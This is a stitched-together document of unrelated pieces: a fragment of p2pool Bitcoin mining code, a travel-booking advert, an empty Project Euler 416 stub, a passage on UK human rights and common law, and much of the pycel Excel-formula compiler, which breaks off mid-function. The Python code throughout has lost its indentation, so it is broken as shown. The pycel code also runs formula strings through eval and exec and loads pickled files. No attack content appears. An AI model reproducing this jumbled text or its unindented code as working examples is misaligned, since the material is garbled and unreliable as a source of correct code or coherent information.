if (self.node.p2p_node is None or len(self.node.p2p_node.peers) == 0) and self.node.net.PERSIST:
raise jsonrpc.Error_for_code(-12345)(u'p2pool is not connected to any peers')
if self.node.best_share_var.value is None and self.node.net.PERSIST:
raise jsonrpc.Error_for_code(-12345)(u'p2pool is downloading shares')
if time.time() > self.current_work.value['last_update'] + 60:
raise jsonrpc.Error_for_code(-12345)(u'lost contact with bitcoind')
if self.merged_work.value:
tree, size = bitcoin_data.make_auxpow_tree(self.merged_work.value)
mm_hashes = [self.merged_work.value.get(tree.get(i), dict(hash=0))['hash'] for i in xrange(size)]
mm_data = '\xfa\xbemm' + bitcoin_data.aux_pow_coinbase_type.pack(dict(
merkle_root=bitcoin_data.merkle_hash(mm_hashes),
size=size,
nonce=0,
))
mm_later = [(aux_work, mm_hashes.index(aux_work['hash']), mm_hashes) for chain_id, aux_work in self.merged_work.value.iteritems()]
else:
mm_data = ''
mm_later = []
tx_hashes = [bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx)) for tx in self.current_work.value['transactions']]
tx_map = dict(zip(tx_hashes, self.current_work.value['transactions']))
if self.node.best_share_var.value is None:
share_type = p2pool_data.Share
else:
previous_share = self.node.tracker.items[self.node.best_share_var.value]
previous_share_type = type(previous_share)
if previous_share_type.SUCCESSOR is None or self.node.tracker.get_height(previous_share.hash) < self.node.net.CHAIN_LENGTH:
share_type = previous_share_type
else:
successor_type = previous_share_type.SUCCESSOR
counts = p2pool_data.get_desired_version_counts(self.node.tracker,
self.node.tracker.get_nth_parent_hash(previous_share.hash, self.node.net.CHAIN_LENGTH*9//10), self.node.net.CHAIN_LENGTH//10)
                # Share -> NewShare only valid if 95% of hashes in [net.CHAIN_LENGTH*9//10, net.CHAIN_LENGTH] are for the new version
if counts.get(successor_type.VERSION, 0) > sum(counts.itervalues())*95//100:
share_type = successor_type
else:
share_type = previous_share_type
if True:
share_info, gentx, other_transaction_hashes, get_share = share_type.generate_transaction(
tracker=self.node.tracker,
share_data=dict(
previous_share_hash=self.node.best_share_var.value,
coinbase=(script.create_push_script([
self.current_work.value['height'],
] + ([mm_data] if mm_data else []) + [
]) + self.current_work.value['coinbaseflags'])[:100],
nonce=random.randrange(2**32),
pubkey_hash=pubkey_hash,
subsidy=self.current_work.value['subsidy'],
donation=math.perfect_round(65535*self.donation_percentage/100),
stale_info=(lambda (orphans, doas), total, (orphans_recorded_in_chain, doas_recorded_in_chain):
'orphan' if orphans > orphans_recorded_in_chain else
'doa' if doas > doas_recorded_in_chain else
None
)(*self.get_stale_counts()),
desired_version=share_type.SUCCESSOR.VERSION if share_type.SUCCESSOR is not None else share_type.VERSION,
),
block_target=self.current_work.value['bits'].target,
desired_timestamp=int(time.time() + 0.5),
desired_target=desired_share_target,
ref_merkle_link=dict(branch=[], index=0),
desired_other_transaction_hashes_and_fees=zip(tx_hashes, self.current_work.value['transaction_fees']),
net=self.node.net,
known_txs=tx_map,
base_subsidy=self.node.net.PARENT.SUBSIDY_FUNC(self.current_work.value['height']),
)
transactions = [gentx] + [tx_map[tx_hash] for tx_hash in other_transaction_hashes]
mm_later = [(dict(aux_work, target=aux_work['target'] if aux_work['target'] != 'p2pool' else share_info['bits'].target), index, hashes) for aux_work, index, hashes in mm_later]
if desired_pseudoshare_target is None:
target = 2**256-1
if len(self.recent_shares_ts_work) == 50:
hash_rate = sum(work for ts, work in self.recent_shares_ts_work[1:])//(self.recent_shares_ts_work[-1][0] - self.recent_shares_ts_work[0][0])
if hash_rate:
target = min(target, int(2**256/hash_rate))
else:
target = desired_pseudoshare_target
target = max(target, share_info['bits'].target)
for aux_work, index, hashes in mm_later:
target = max(target, aux_work['target'])
target = math.clip(target, self.node.net.PARENT.SANE_TARGET_RANGE)
getwork_time = time.time()
lp_count = self.new_work_event.times
merkle_link = bitcoin_data.calculate_merkle_link([bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx)) for tx in transactions], 0)
print 'New work for worker! Difficulty: %.06f Share difficulty: %.06f Total block value: %.6f %s including %i transactions' % (
bitcoin_data.target_to_difficulty(target),
bitcoin_data.target_to_difficulty(share_info['bits'].target),
self.current_work.value['subsidy']*1e-8, self.node.net.PARENT.SYMBOL,
len(self.current_work.value['transactions']),
)
ba = bitcoin_getwork.BlockAttempt(
version=min(self.current_work.value['version'], 2),
previous_block=self.current_work.value['previous_block'],
merkle_root=bitcoin_data.check_merkle_link(bitcoin_data.hash256(bitcoin_data.tx_type.pack(transactions[0])), merkle_link),
timestamp=self.current_work.value['time'],
bits=self.current_work.value['bits'],
share_target=target,
)
received_header_hashes = set()
def got_response(header, request):
header_hash = bitcoin_data.hash256(bitcoin_data.block_header_type.pack(header))
pow_hash = self.node.net.PARENT.POW_FUNC(bitcoin_data.block_header_type.pack(header))
try:
if pow_hash <= header['bits'].target or p2pool.DEBUG:
helper.submit_block(dict(header=header, txs=transactions), False, self.node.factory, self.node.bitcoind, self.node.bitcoind_work, self.node.net)
if pow_hash <= header['bits'].target:
print
print 'GOT BLOCK FROM MINER! Passing to bitcoind! %s%064x' % (self.node.net.PARENT.BLOCK_EXPLORER_URL_PREFIX, header_hash)
print
except:
log.err(None, 'Error while processing potential block:')
user, _, _, _ = self.get_user_details(request)
assert header['previous_block'] == ba.previous_block
assert header['merkle_root'] == ba.merkle_root
assert header['bits'] == ba.bits
on_time = self.new_work_event.times == lp_count
for aux_work, index, hashes in mm_later:
try:
if pow_hash <= aux_work['target'] or p2pool.DEBUG:
df = deferral.retry('Error submitting merged block: (will retry)', 10, 10)(aux_work['merged_proxy'].rpc_getauxblock)(
pack.IntType(256, 'big').pack(aux_work['hash']).encode('hex'),
bitcoin_data.aux_pow_type.pack(dict(
merkle_tx=dict(
tx=transactions[0],
block_hash=header_hash,
merkle_link=merkle_link,
),
merkle_link=bitcoin_data.calculate_merkle_link(hashes, index),
parent_block_header=header,
)).encode('hex'),
)
@df.addCallback
def _(result, aux_work=aux_work):
if result != (pow_hash <= aux_work['target']):
print >>sys.stderr, 'Merged block submittal result: %s Expected: %s' % (result, pow_hash <= aux_work['target'])
else:
print 'Merged block submittal result: %s' % (result,)
@df.addErrback
def _(err):
log.err(err, 'Error submitting merged block:')
except:
log.err(None, 'Error while processing merged mining POW:')
if pow_hash <= share_info['bits'].target and header_hash not in received_header_hashes:
share = get_share(header, transactions)
print 'GOT SHARE! %s %s prev %s age %.2fs%s' % (
request.getUser(),
p2pool_data.format_hash(share.hash),
p2pool_data.format_hash(share.previous_hash),
time.time() - getwork_time,
' DEAD ON ARRIVAL' if not on_time else '',
)
self.my_share_hashes.add(share.hash)
if not on_time:
self.my_doa_share_hashes.add(share.hash)
self.node.tracker.add(share)
self.node.set_best_share()
try:
if (pow_hash <= header['bits'].target or p2pool.DEBUG) and self.node.p2p_node is not None:
self.node.p2p_node.broadcast_share(share.hash)
except:
log.err(None, 'Error forwarding block solution:')
self.share_received.happened(bitcoin_data.target_to_average_attempts(share.target), not on_time)
if pow_hash > target:
print 'Worker %s submitted share with hash > target:' % (request.getUser(),)
print ' Hash: %56x' % (pow_hash,)
print ' Target: %56x' % (target,)
elif header_hash in received_header_hashes:
print >>sys.stderr, 'Worker %s @ %s submitted share more than once!' % (request.getUser(), request.getClientIP())
else:
received_header_hashes.add(header_hash)
self.pseudoshare_received.happened(bitcoin_data.target_to_average_attempts(target), not on_time, user)
self.recent_shares_ts_work.append((time.time(), bitcoin_data.target_to_average_attempts(target)))
while len(self.recent_shares_ts_work) > 50:
self.recent_shares_ts_work.pop(0)
self.local_rate_monitor.add_datum(dict(work=bitcoin_data.target_to_average_attempts(target), dead=not on_time, user=user))
return on_time
return ba, got_response
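
# A minimal sketch of the pseudoshare-target heuristic used in get_work above:
# choosing target ~= 2**256 // hash_rate makes the expected number of hash
# attempts per pseudoshare roughly equal to the hash rate, i.e. about one
# pseudoshare per second of work. The function name is illustrative, not part
# of the original API.
def _example_pseudoshare_target(hash_rate):
    return min(2**256 - 1, 2**256 // hash_rate)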
|
Book hotels and make payments.
Find a variety of options to book airline tickets, hotels, tour packages, car rentals, and more. Choose your favorite destination and start planning your long-awaited vacation. You can also check flight availability.
__problem_title__ = "A frog's trip"
__problem_url__ = "https://projecteuler.net/problem=416"
__problem_description__ = "A row of n squares contains a frog in the leftmost square. By " \
                          "successive jumps the frog goes to the rightmost square and then back " \
                          "to the leftmost square. On the outward trip he jumps one, two or " \
                          "three squares to the right, and on the homeward trip he jumps to the " \
                          "left in a similar manner. He cannot jump outside the squares. He " \
                          "repeats the round-trip travel m times. Let F(m, n) be the number of " \
                          "ways the frog can travel so that at most one square remains " \
                          "unvisited. For example, F(1, 3) = 4, F(1, 4) = 15, F(1, 5) = 46, " \
                          "F(2, 3) = 16 and F(2, 100) mod 10^9 = 429619151. Find the last 9 " \
                          "digits of F(10, 10^12)."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
The UK government, like other governments, signed a human rights convention – in this case the European Convention on Human Rights – which meant that the rights of the people affected were protected under international law (which forms part of UK law). The convention was later incorporated directly into UK law through an Act of Parliament – the Human Rights Act.
Read more about the claimant’s human rights claims here.
Common law also forms part of UK law (alongside international law and parliamentary acts). Common law is formulated by judges through decided cases. It often stems back many centuries and is not defined by statute (i.e. Acts of Parliament). These are principles that have been distilled by English courts through the ages into a kind of "rights". There are general principles that apply in common law (often now replicated in Acts of Parliament) such as fair trial, legality, and property rights. They are a general set of legal principles applied by the courts.
Read more about the claimant’s common law claims here. |
# We will choose our wrapper based on OS compatibility
# ExcelComWrapper : Must be run on Windows as it requires a COM link to an Excel instance.
# ExcelOpxWrapper : Can be run anywhere but only with post-2010 Excel formats
try:
    import win32com.client
    import pythoncom
    from pycel.excelwrapper import ExcelComWrapper as ExcelWrapperImpl
except ImportError:
    print "Can't import win32com -> switching from COM to Openpyxl wrapping implementation"
    from pycel.excelwrapper import ExcelOpxWrapper as ExcelWrapperImpl
import pycel.excellib
from pycel.excellib import *
from pycel.excelutil import *
from math import *
from networkx.classes.digraph import DiGraph
from networkx.drawing.nx_pydot import write_dot
from networkx.drawing.nx_pylab import draw, draw_circular
from networkx.readwrite.gexf import write_gexf
from pycel.tokenizer import ExcelParser, f_token, shunting_yard
import cPickle
import logging
import networkx as nx
__version__ = filter(str.isdigit, "$Revision: 2524 $")
__date__ = filter(str.isdigit, "$Date: 2011-09-06 17:05:00 +0100 (Tue, 06 Sep 2011) $")
__author__ = filter(str.isdigit, "$Author: dg2d09 $")
class Spreadsheet(object):
def __init__(self, G, cellmap):
super(Spreadsheet, self).__init__()
self.G = G
self.cellmap = cellmap
self.params = None
@staticmethod
def load_from_file(fname):
f = open(fname, 'rb')
obj = cPickle.load(f)
# obj = load(f)
return obj
def save_to_file(self, fname):
f = open(fname, 'wb')
cPickle.dump(self, f, protocol=2)
f.close()
def export_to_dot(self, fname):
write_dot(self.G, fname)
def export_to_gexf(self, fname):
write_gexf(self.G, fname)
def plot_graph(self):
import matplotlib.pyplot as plt
pos = nx.spring_layout(self.G, iterations=2000)
# pos=nx.spectral_layout(G)
# pos = nx.random_layout(G)
nx.draw_networkx_nodes(self.G, pos)
nx.draw_networkx_edges(self.G, pos, arrows=True)
nx.draw_networkx_labels(self.G, pos)
plt.show()
def set_value(self, cell, val, is_addr=True):
if is_addr:
cell = self.cellmap[cell]
if cell.value != val:
# reset the node + its dependencies
self.reset(cell)
# set the value
cell.value = val
def reset(self, cell):
if cell.value is None: return
# print "resetting", cell.address()
cell.value = None
map(self.reset, self.G.successors_iter(cell))
def print_value_tree(self, addr, indent):
cell = self.cellmap[addr]
print "%s %s = %s" % (" " * indent, addr, cell.value)
for c in self.G.predecessors_iter(cell):
self.print_value_tree(c.address(), indent + 1)
def recalculate(self):
for c in self.cellmap.values():
if isinstance(c, CellRange):
self.evaluate_range(c, is_addr=False)
else:
self.evaluate(c, is_addr=False)
def evaluate_range(self, rng, is_addr=True):
if is_addr:
rng = self.cellmap[rng]
        # it's important that [] gets treated as false here
if rng.value:
return rng.value
cells, nrows, ncols = rng.celladdrs, rng.nrows, rng.ncols
if nrows == 1 or ncols == 1:
data = [self.evaluate(c) for c in cells]
else:
data = [[self.evaluate(c) for c in cells[i]] for i in range(len(cells))]
rng.value = data
return data
def evaluate(self, cell, is_addr=True):
if is_addr:
cell = self.cellmap[cell]
# no formula, fixed value
if not cell.formula or cell.value != None:
# print " returning constant or cached value for ", cell.address()
return cell.value
# recalculate formula
# the compiled expression calls this function
def eval_cell(address):
return self.evaluate(address)
def eval_range(rng):
return self.evaluate_range(rng)
try:
print "Evalling: %s, %s" % (cell.address(), cell.python_expression)
vv = eval(cell.compiled_expression)
# print "Cell %s evalled to %s" % (cell.address(),vv)
if vv is None:
print "WARNING %s is None" % (cell.address())
cell.value = vv
except Exception as e:
if e.message.startswith("Problem evalling"):
raise e
else:
raise Exception("Problem evalling: %s for %s, %s" % (e, cell.address(), cell.python_expression))
return cell.value
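
# A minimal usage sketch of the Spreadsheet/ExcelCompiler pair (the file name,
# sheet, and cell addresses are hypothetical):
#   sp = ExcelCompiler(filename="model.xlsx").gen_graph('A1:B10', sheet='Sheet1')
#   sp.set_value('Sheet1!A1', 4)
#   print sp.evaluate('Sheet1!B10')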
class ASTNode(object):
"""A generic node in the AST"""
def __init__(self, token):
super(ASTNode, self).__init__()
self.token = token
def __str__(self):
return self.token.tvalue
def __getattr__(self, name):
return getattr(self.token, name)
def children(self, ast):
args = ast.predecessors(self)
args = sorted(args, key=lambda x: ast.node[x]['pos'])
# args.reverse()
return args
def parent(self, ast):
args = ast.successors(self)
return args[0] if args else None
def emit(self, ast, context=None):
"""Emit code"""
self.token.tvalue
class OperatorNode(ASTNode):
def __init__(self, *args):
super(OperatorNode, self).__init__(*args)
# convert the operator to python equivalents
self.opmap = {
"^": "**",
"=": "==",
"&": "+",
"": "+" # union
}
def emit(self, ast, context=None):
xop = self.tvalue
# Get the arguments
args = self.children(ast)
op = self.opmap.get(xop, xop)
if self.ttype == "operator-prefix":
return "-" + args[0].emit(ast, context=context)
parent = self.parent(ast)
# dont render the ^{1,2,..} part in a linest formula
# TODO: bit of a hack
if op == "**":
if parent and parent.tvalue.lower() == "linest":
return args[0].emit(ast, context=context)
# TODO silly hack to work around the fact that None < 0 is True (happens on blank cells)
if op == "<" or op == "<=":
aa = args[0].emit(ast, context=context)
ss = "(" + aa + " if " + aa + " is not None else float('inf'))" + op + args[1].emit(ast, context=context)
elif op == ">" or op == ">=":
aa = args[1].emit(ast, context=context)
ss = args[0].emit(ast, context=context) + op + "(" + aa + " if " + aa + " is not None else float('inf'))"
else:
ss = args[0].emit(ast, context=context) + op + args[1].emit(ast, context=context)
# avoid needless parentheses
if parent and not isinstance(parent, FunctionNode):
ss = "(" + ss + ")"
return ss
class OperandNode(ASTNode):
def __init__(self, *args):
super(OperandNode, self).__init__(*args)
def emit(self, ast, context=None):
t = self.tsubtype
if t == "logical":
return str(self.tvalue.lower() == "true")
elif t == "text" or t == "error":
# if the string contains quotes, escape them
val = self.tvalue.replace('"', '\\"')
return '"' + val + '"'
else:
return str(self.tvalue)
class RangeNode(OperandNode):
"""Represents a spreadsheet cell or range, e.g., A5 or B3:C20"""
def __init__(self, *args):
super(RangeNode, self).__init__(*args)
def get_cells(self):
return resolve_range(self.tvalue)[0]
def emit(self, ast, context=None):
# resolve the range into cells
rng = self.tvalue.replace('$', '')
sheet = context.curcell.sheet + "!" if context else ""
if is_range(rng):
sh, start, end = split_range(rng)
if sh:
str = 'eval_range("' + rng + '")'
else:
str = 'eval_range("' + sheet + rng + '")'
else:
sh, col, row = split_address(rng)
if sh:
str = 'eval_cell("' + rng + '")'
else:
str = 'eval_cell("' + sheet + rng + '")'
return str
class FunctionNode(ASTNode):
"""AST node representing a function call"""
def __init__(self, *args):
super(FunctionNode, self).__init__(*args)
self.numargs = 0
# map excel functions onto their python equivalents
self.funmap = pycel.excellib.FUNCTION_MAP
def emit(self, ast, context=None):
fun = self.tvalue.lower()
str = ''
# Get the arguments
args = self.children(ast)
if fun == "atan2":
# swap arguments
str = "atan2(%s,%s)" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context))
elif fun == "pi":
# constant, no parens
str = "pi"
elif fun == "if":
# inline the if
if len(args) == 2:
str = "%s if %s else 0" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context))
elif len(args) == 3:
str = "(%s if %s else %s)" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context),
args[2].emit(ast, context=context))
else:
raise Exception("if with %s arguments not supported" % len(args))
elif fun == "array":
str += '['
if len(args) == 1:
# only one row
str += args[0].emit(ast, context=context)
else:
# multiple rows
str += ",".join(['[' + n.emit(ast, context=context) + ']' for n in args])
str += ']'
elif fun == "arrayrow":
# simply create a list
str += ",".join([n.emit(ast, context=context) for n in args])
elif fun == "linest" or fun == "linestmario":
str = fun + "(" + ",".join([n.emit(ast, context=context) for n in args])
if not context:
degree, coef = -1, -1
else:
# linests are often used as part of an array formula spanning multiple cells,
# one cell for each coefficient. We have to figure out where we currently are
# in that range
degree, coef = get_linest_degree(context.excel, context.curcell)
# if we are the only linest (degree is one) and linest is nested -> return vector
# else return the coef.
if degree == 1 and self.parent(ast):
if fun == "linest":
str += ",degree=%s)" % degree
else:
str += ")"
else:
if fun == "linest":
str += ",degree=%s)[%s]" % (degree, coef - 1)
else:
str += ")[%s]" % (coef - 1)
elif fun == "and":
str = "all([" + ",".join([n.emit(ast, context=context) for n in args]) + "])"
elif fun == "or":
str = "any([" + ",".join([n.emit(ast, context=context) for n in args]) + "])"
else:
# map to the correct name
f = self.funmap.get(fun, fun)
str = f + "(" + ",".join([n.emit(ast, context=context) for n in args]) + ")"
return str
def create_node(t):
"""Simple factory function"""
if t.ttype == "operand":
if t.tsubtype == "range":
return RangeNode(t)
else:
return OperandNode(t)
elif t.ttype == "function":
return FunctionNode(t)
elif t.ttype.startswith("operator"):
return OperatorNode(t)
else:
return ASTNode(t)
class Operator:
"""Small wrapper class to manage operators during shunting yard"""
def __init__(self, value, precedence, associativity):
self.value = value
self.precedence = precedence
self.associativity = associativity
def shunting_yard(expression):
"""
Tokenize an excel formula expression into reverse polish notation
Core algorithm taken from wikipedia with varargs extensions from
http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-algorithm-to-allow-variable-numbers-of-arguments-to-functions/
"""
# remove leading =
if expression.startswith('='):
expression = expression[1:]
    p = ExcelParser()
p.parse(expression)
# insert tokens for '(' and ')', to make things clearer below
tokens = []
for t in p.tokens.items:
if t.ttype == "function" and t.tsubtype == "start":
t.tsubtype = ""
tokens.append(t)
tokens.append(f_token('(', 'arglist', 'start'))
elif t.ttype == "function" and t.tsubtype == "stop":
tokens.append(f_token(')', 'arglist', 'stop'))
elif t.ttype == "subexpression" and t.tsubtype == "start":
t.tvalue = '('
tokens.append(t)
elif t.ttype == "subexpression" and t.tsubtype == "stop":
t.tvalue = ')'
tokens.append(t)
else:
tokens.append(t)
# print "tokens: ", "|".join([x.tvalue for x in tokens])
# http://office.microsoft.com/en-us/excel-help/calculation-operators-and-precedence-HP010078886.aspx
operators = {}
operators[':'] = Operator(':', 8, 'left')
operators[''] = Operator(' ', 8, 'left')
operators[','] = Operator(',', 8, 'left')
operators['u-'] = Operator('u-', 7, 'left') # unary negation
operators['%'] = Operator('%', 6, 'left')
operators['^'] = Operator('^', 5, 'left')
operators['*'] = Operator('*', 4, 'left')
operators['/'] = Operator('/', 4, 'left')
operators['+'] = Operator('+', 3, 'left')
operators['-'] = Operator('-', 3, 'left')
operators['&'] = Operator('&', 2, 'left')
operators['='] = Operator('=', 1, 'left')
operators['<'] = Operator('<', 1, 'left')
operators['>'] = Operator('>', 1, 'left')
operators['<='] = Operator('<=', 1, 'left')
operators['>='] = Operator('>=', 1, 'left')
operators['<>'] = Operator('<>', 1, 'left')
output = collections.deque()
stack = []
were_values = []
arg_count = []
for t in tokens:
if t.ttype == "operand":
output.append(create_node(t))
if were_values:
were_values.pop()
were_values.append(True)
elif t.ttype == "function":
stack.append(t)
arg_count.append(0)
if were_values:
were_values.pop()
were_values.append(True)
were_values.append(False)
elif t.ttype == "argument":
while stack and (stack[-1].tsubtype != "start"):
output.append(create_node(stack.pop()))
if were_values.pop(): arg_count[-1] += 1
were_values.append(False)
if not len(stack):
raise Exception("Mismatched or misplaced parentheses")
elif t.ttype.startswith('operator'):
if t.ttype.endswith('-prefix') and t.tvalue == "-":
o1 = operators['u-']
else:
o1 = operators[t.tvalue]
while stack and stack[-1].ttype.startswith('operator'):
if stack[-1].ttype.endswith('-prefix') and stack[-1].tvalue == "-":
o2 = operators['u-']
else:
o2 = operators[stack[-1].tvalue]
if ((o1.associativity == "left" and o1.precedence <= o2.precedence)
or
(o1.associativity == "right" and o1.precedence < o2.precedence)):
output.append(create_node(stack.pop()))
else:
break
stack.append(t)
elif t.tsubtype == "start":
stack.append(t)
elif t.tsubtype == "stop":
while stack and stack[-1].tsubtype != "start":
output.append(create_node(stack.pop()))
if not stack:
raise Exception("Mismatched or misplaced parentheses")
stack.pop()
if stack and stack[-1].ttype == "function":
f = create_node(stack.pop())
a = arg_count.pop()
w = were_values.pop()
if w: a += 1
f.num_args = a
# print f, "has ",a," args"
output.append(f)
while stack:
if stack[-1].tsubtype == "start" or stack[-1].tsubtype == "stop":
raise Exception("Mismatched or misplaced parentheses")
output.append(create_node(stack.pop()))
# print "Stack is: ", "|".join(stack)
# print "Ouput is: ", "|".join([x.tvalue for x in output])
# convert to list
result = [x for x in output]
return result
def build_ast(expression):
"""build an AST from an Excel formula expression in reverse polish notation"""
# use a directed graph to store the tree
G = DiGraph()
stack = []
for n in expression:
# Since the graph does not maintain the order of adding nodes/edges
# add an extra attribute 'pos' so we can always sort to the correct order
if isinstance(n, OperatorNode):
if n.ttype == "operator-infix":
arg2 = stack.pop()
arg1 = stack.pop()
G.add_node(arg1, {'pos': 1})
G.add_node(arg2, {'pos': 2})
G.add_edge(arg1, n)
G.add_edge(arg2, n)
else:
arg1 = stack.pop()
G.add_node(arg1, {'pos': 1})
G.add_edge(arg1, n)
elif isinstance(n, FunctionNode):
args = [stack.pop() for _ in range(n.num_args)]
args.reverse()
for i, a in enumerate(args):
G.add_node(a, {'pos': i})
G.add_edge(a, n)
# for i in range(n.num_args):
# G.add_edge(stack.pop(),n)
else:
G.add_node(n, {'pos': 0})
stack.append(n)
return G, stack.pop()
class Context(object):
"""A small context object that nodes in the AST can use to emit code"""
def __init__(self, curcell, excel):
# the current cell for which we are generating code
self.curcell = curcell
# a handle to an excel instance
self.excel = excel
class ExcelCompiler(object):
"""Class responsible for taking an Excel spreadsheet and compiling it to a Spreadsheet instance
that can be serialized to disk, and executed independently of excel.
"""
def __init__(self, filename=None, excel=None, *args, **kwargs):
super(ExcelCompiler, self).__init__()
self.filename = filename
if excel:
# if we are running as an excel addin, this gets passed to us
self.excel = excel
else:
# TODO: use a proper interface so we can (eventually) support loading from file (much faster) Still need to find a good lib though.
self.excel = ExcelWrapperImpl(filename=filename)
self.excel.connect()
self.log = logging.getLogger("decode.{0}".format(self.__class__.__name__))
def cell2code(self, cell):
"""Generate python code for the given cell"""
if cell.formula:
e = shunting_yard(cell.formula or str(cell.value))
print e
ast, root = build_ast(e)
code = root.emit(ast, context=Context(cell, self.excel))
else:
ast = None
code = str('"' + cell.value + '"' if isinstance(cell.value, unicode) else cell.value)
return code, ast
def add_node_to_graph(self, G, n):
G.add_node(n)
G.node[n]['sheet'] = n.sheet
if isinstance(n, Cell):
G.node[n]['label'] = n.col + str(n.row)
else:
# strip the sheet
G.node[n]['label'] = n.address()[n.address().find('!') + 1:]
def gen_graph(self, seed, sheet=None):
"""Given a starting point (e.g., A6, or A3:B7) on a particular sheet, generate
a Spreadsheet instance that captures the logic and control flow of the equations."""
# starting points
cursheet = sheet if sheet else self.excel.get_active_sheet()
self.excel.set_sheet(cursheet)
seeds, nr, nc = Cell.make_cells(self.excel, seed,
sheet=cursheet) # no need to output nr and nc here, since seed can be a list of unlinked cells
seeds = list(flatten(seeds))
print "Seed %s expanded into %s cells" % (seed, len(seeds))
# only keep seeds with formulas or numbers
seeds = [s for s in seeds if s.formula or isinstance(s.value, (int, float))]
print "%s filtered seeds " % len(seeds)
# cells to analyze: only formulas
todo = [s for s in seeds if s.formula]
print "%s cells on the todo list" % len(todo)
# map of all cells
cellmap = dict([(x.address(), x) for x in seeds])
# directed graph
G = nx.DiGraph()
# match the info in cellmap
for c in cellmap.itervalues(): self.add_node_to_graph(G, c)
while todo:
c1 = todo.pop()
print "Handling ", c1.address()
# set the current sheet so relative addresses resolve properly
if c1.sheet != cursheet:
cursheet = c1.sheet
self.excel.set_sheet(cursheet)
# parse the formula into code
pystr, ast = self.cell2code(c1)
# set the code & compile it (will flag problems sooner rather than later)
c1.python_expression = pystr
c1.compile()
# get all the cells/ranges this formula refers to
deps = [x.tvalue.replace('$', '') for x in ast.nodes() if isinstance(x, RangeNode)]
# remove dupes
deps = uniqueify(deps)
for dep in deps:
# if the dependency is a multi-cell range, create a range object
if is_range(dep):
# this will make sure we always have an absolute address
rng = CellRange(dep, sheet=cursheet)
if rng.address() in cellmap:
# already dealt with this range
# add an edge from the range to the parent
G.add_edge(cellmap[rng.address()], cellmap[c1.address()])
continue
else:
# turn into cell objects
cells, nrows, ncols = Cell.make_cells(self.excel, dep, sheet=cursheet)
# get the values so we can set the range value
if nrows == 1 or ncols == 1:
rng.value = [c.value for c in cells]
else:
rng.value = [[c.value for c in cells[i]] for i in range(len(cells))]
# save the range
cellmap[rng.address()] = rng
# add an edge from the range to the parent
self.add_node_to_graph(G, rng)
G.add_edge(rng, cellmap[c1.address()])
# cells in the range should point to the range as their parent
target = rng
else:
# not a range, create the cell object
cells = [Cell.resolve_cell(self.excel, dep, sheet=cursheet)]
target = cellmap[c1.address()]
# process each cell
for c2 in flatten(cells):
                    # if we haven't treated this cell already
if c2.address() not in cellmap:
if c2.formula:
# cell with a formula, needs to be added to the todo list
todo.append(c2)
# print "appended ", c2.address()
else:
# constant cell, no need for further processing, just remember to set the code
pystr, ast = self.cell2code(c2)
c2.python_expression = pystr
c2.compile()
# print "skipped ", c2.address()
# save in the cellmap
cellmap[c2.address()] = c2
# add to the graph
self.add_node_to_graph(G, c2)
# add an edge from the cell to the parent (range or cell)
G.add_edge(cellmap[c2.address()], target)
print "Graph construction done, %s nodes, %s edges, %s cellmap entries" % (
len(G.nodes()), len(G.edges()), len(cellmap))
sp = Spreadsheet(G, cellmap)
return sp
if __name__ == '__main__':
import re
def encode_conditions(conditions):
for i in range(len(conditions)):
conditions[i] = conditions[i].replace("(s)", '("s")')
conditions[i] = conditions[i].replace("(r)", '("r")')
exists = re.findall(r'(exists\(.*?\))', conditions[i], re.M | re.I)
for j in range(len(exists)):
conditions[i] = conditions[i].replace(exists[j], '\"' + exists[j] + '\"')
for_each = re.findall(r'(foreach\(.*?\))', conditions[i], re.M | re.I)
for j in range(len(for_each)):
conditions[i] = conditions[i].replace(for_each[j], '\"' + for_each[j] + '\"')
return conditions
def generate_quantifier_vector(quantifier, type='exists'):
        '''Receive an exists condition and generate a boolean vector based on its condition.
        Type can be either exists or for_each.'''
exp_in_paranth = re.findall(r'' + type + '\((.*?)\)', quantifier, re.M | re.I)
exp_in_paranth = exp_in_paranth[0].split(",")
vecs = re.findall(r'(.)\[.\]', exp_in_paranth[-1], re.M | re.I)
condition_vec = "1 " if type == 'exists' else "0 "
condition_vec += "in [1 if " + exp_in_paranth[-1] + " else 0 "
for i in range(len(exp_in_paranth) - 1):
condition_vec += "for " + exp_in_paranth[i] + " in range(len(" + vecs[i] + ")) "
condition_vec += "]"
return condition_vec
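    # Illustrative transformation: after index decoding, an input such as
    #   'exists(i,j,s[i]==r[j])'
    # becomes a comprehension string of the form
    #   '1 in [1 if s[i]==r[j] else 0 for i in range(len(s)) for j in range(len(r)) ]'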
def decode_conditions(conditions):
for i in range(len(conditions)):
conditions[i] = conditions[i].replace('("s")', '(s)')
conditions[i] = conditions[i].replace('("r")', '(r)')
for quantifier in ['exists', 'foreach']:
exists = re.findall(r'\"(' + quantifier + '\(.*?\))\"', conditions[i], re.M | re.I)
for j in range(len(exists)):
exists_with_indices = list(exists)
entries = re.findall(r'(._.)', exists[j], re.M | re.I)
for k in range(len(entries)):
exists_with_indices[j] = exists_with_indices[j].replace(entries[k],
(entries[k].replace("_", "[") + "]"))
if not (">" in exists_with_indices[j]) and not ("<" in exists_with_indices[j]):
exists_with_indices[j] = exists_with_indices[j].replace("=", "==")
exists_with_indices[j] = generate_quantifier_vector(exists_with_indices[j], quantifier)
conditions[i] = conditions[i].replace('\"' + exists[j] + '\"', exists_with_indices[j])
return conditions
def parse_conditions(conds):
conds = encode_conditions(conds)
python_inputs = []
for i in conds:
print "**************************************************"
print "Formula: ", i
            e = shunting_yard(i)
# print "RPN: ", "|".join([str(x) for x in e])
G, root = build_ast(e)
python_inputs += [root.emit(G, context=None)]
print "Python code: ", root.emit(G, context=None)
print "**************************************************"
return decode_conditions(python_inputs)
def classify_strategies_to_dimensions(strategies, dimensions_matrix, dimensions_rows_conds,
dimensions_columns_conds):
row = ""
col = ""
for t in strategies:
s = tuple(t)
exec "row =" + dimensions_rows_conds[0]
exec "col =" + dimensions_columns_conds[0]
dimensions_matrix[row][col][s] = dict()
return dimensions_matrix
def create_dimensions_matrix(dimensions_rows_categories_names, dimensions_columns_categories_names):
dimensions_matrix = {row_name: dict() for row_name in dimensions_rows_categories_names}
for row_name in dimensions_matrix:
